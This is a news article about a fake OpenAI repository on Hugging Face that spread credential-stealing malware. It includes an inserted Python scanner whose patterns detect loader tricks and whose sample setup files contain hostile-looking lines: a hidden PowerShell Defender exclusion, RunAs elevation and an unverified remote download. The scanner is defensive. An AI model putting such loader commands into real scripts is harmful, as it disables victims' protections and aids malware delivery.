THE LAND OF NEWS
May 15, 2026


Fake OpenAI AI Model on Hugging Face Spread Malware to 244,000 Users

A fake OpenAI repository on Hugging Face reached 244,000 downloads before researchers discovered it was distributing credential-stealing malware targeting Windows users and crypto wallets.

A fake OpenAI project uploaded to AI platform Hugging Face briefly became the site’s top trending repository before researchers discovered it was secretly distributing information-stealing malware designed to target Windows users, browser credentials and cryptocurrency wallets.

The malicious repository impersonated OpenAI’s legitimate “Privacy Filter” AI model by copying its description and branding almost word-for-word, tricking developers and AI enthusiasts into downloading infected files. Researchers say the fake project reached nearly 244,000 downloads and accumulated hundreds of likes before being removed from the platform.

Cybersecurity firm HiddenLayer said the repository contained hidden malicious scripts that executed a Rust-based infostealer capable of harvesting passwords, Discord tokens, browser sessions, crypto wallet data, FileZilla credentials and sensitive files from infected systems.

How the Fake OpenAI Repository Worked

The attackers created a project called “Open-OSS/privacy-filter,” designed to closely resemble OpenAI’s real Privacy Filter release.

Users were instructed to run setup scripts such as start.bat or loader.py, which appeared to install AI dependencies but instead triggered malicious code in the background.

Researchers found the malware:

  • Disabled SSL verification
  • Downloaded hidden payloads remotely
  • Added Microsoft Defender exclusions
  • Elevated privileges through Windows prompts
  • Executed a second-stage infostealer silently

The malware also included anti-analysis protections designed to evade virtual machines, debuggers and security monitoring tools.
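The loader behaviors in the list above can be checked for before any downloaded setup script is run. The following triage scanner is an added example, not code from HiddenLayer or from the repository itself; the regex rules, the verdict thresholds and the sample file contents are assumptions constructed for illustration.

```python
import re

# Heuristic rules for the loader behaviors listed in the article. The patterns
# are this example's assumptions, not indicators published by the researchers.
RULES = {
    "ssl_verification_disabled": re.compile(
        r"verify\s*=\s*False|_create_unverified_context|CERT_NONE"
        r"|curl\b[^\n]*\s(-k|--insecure)\b", re.I),
    "remote_download": re.compile(
        r"urlretrieve|urlopen|requests\.get|Invoke-WebRequest|DownloadFile"
        r"|certutil\b[^\n]*-urlcache|bitsadmin", re.I),
    "defender_exclusion": re.compile(r"(Add|Set)-MpPreference\b[^\n]*-Exclusion", re.I),
    "privilege_elevation": re.compile(r"-Verb\s+RunAs|ShellExecute\w*\b[^\n]*runas", re.I),
    "hidden_execution": re.compile(r"-WindowStyle\s+Hidden|CREATE_NO_WINDOW|\bpythonw\b", re.I),
}

def scan_text(text):
    """Return {rule_name: [1-based line numbers]} for each rule that matches."""
    hits = {}
    for lineno, line in enumerate(text.splitlines(), 1):
        for name, rx in RULES.items():
            if rx.search(line):
                hits.setdefault(name, []).append(lineno)
    return hits

def verdict(files):
    """files maps filename -> content. Returns (level, per-file hits)."""
    per_file = {name: scan_text(body) for name, body in files.items()}
    seen = set().union(*(h.keys() for h in per_file.values()))
    # One hit alone (a plain download) is common in honest setup scripts.
    # A Defender exclusion, or three or more behaviors together, is not.
    if "defender_exclusion" in seen or len(seen) >= 3:
        return "block", per_file
    return ("review" if seen else "clean"), per_file

# Constructed sample repository contents (placeholders, not the real files).
SAMPLE_REPO = {
    "loader.py": 'import requests\n'
                 'r = requests.get("https://example.invalid/deps.bin", verify=False)\n',
    "start.bat": '@echo off\n'
                 'powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath <PATH>"\n'
                 'powershell Start-Process python -ArgumentList loader.py -Verb RunAs\n',
    "README.md": "Run start.bat to install dependencies.\n",
}

if __name__ == "__main__":
    level, report = verdict(SAMPLE_REPO)
    print(level)
    for fname, hits in report.items():
        print(fname, hits)
```

A "review" or "block" result means a person should read the script before anything is executed; a "clean" result only means none of these particular patterns appeared.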

Cryptocurrency Wallets and Browser Data Targeted

According to the investigation, the final malware payload focused heavily on credential theft and crypto-related data.

The infostealer reportedly targeted:

  • Chromium and Firefox browser data
  • Saved passwords and cookies
  • Discord authentication tokens
  • Cryptocurrency wallet extensions
  • SSH, VPN and FTP credentials
  • Sensitive local files and wallet seed phrases

Researchers said the stolen data was compressed and transmitted to remote command-and-control servers controlled by the attackers.

Broader AI Supply Chain Security Concerns Emerge

The incident is raising wider concerns about security risks inside the rapidly expanding open-source AI ecosystem.

HiddenLayer researchers uncovered several additional repositories using similar malicious infrastructure and noted overlaps with previous malware campaigns linked to the WinOS 4.0 and ValleyRAT malware families.

Security analysts warned that attackers are increasingly exploiting trust in AI tools, open-source repositories and developer platforms to distribute malware through what appears to be legitimate software.

Other Major Cybersecurity Threats Surface

The fake OpenAI repository appeared alongside a wave of other major cybersecurity incidents reported this week.

Security researchers disclosed three new vulnerabilities affecting cPanel and WHM systems, including flaws that could allow privilege escalation and remote code execution.

Meanwhile, the official website for open-source download manager JDownloader was reportedly compromised and used to distribute malware installers targeting Windows and Linux users.

Universities across the United States also faced disruptions after a cyberattack linked to the Canvas education platform forced several institutions to reschedule final exams.

What Users Should Do

Cybersecurity experts say anyone who downloaded files from the fake Hugging Face repository should immediately:

  • Disconnect the affected system
  • Change all stored passwords
  • Replace crypto wallet seed phrases
  • Invalidate browser sessions and tokens
  • Consider fully reinstalling the operating system

Researchers warned that the attack demonstrates how AI platforms and open-source ecosystems are becoming increasingly attractive targets for sophisticated cybercriminal operations.
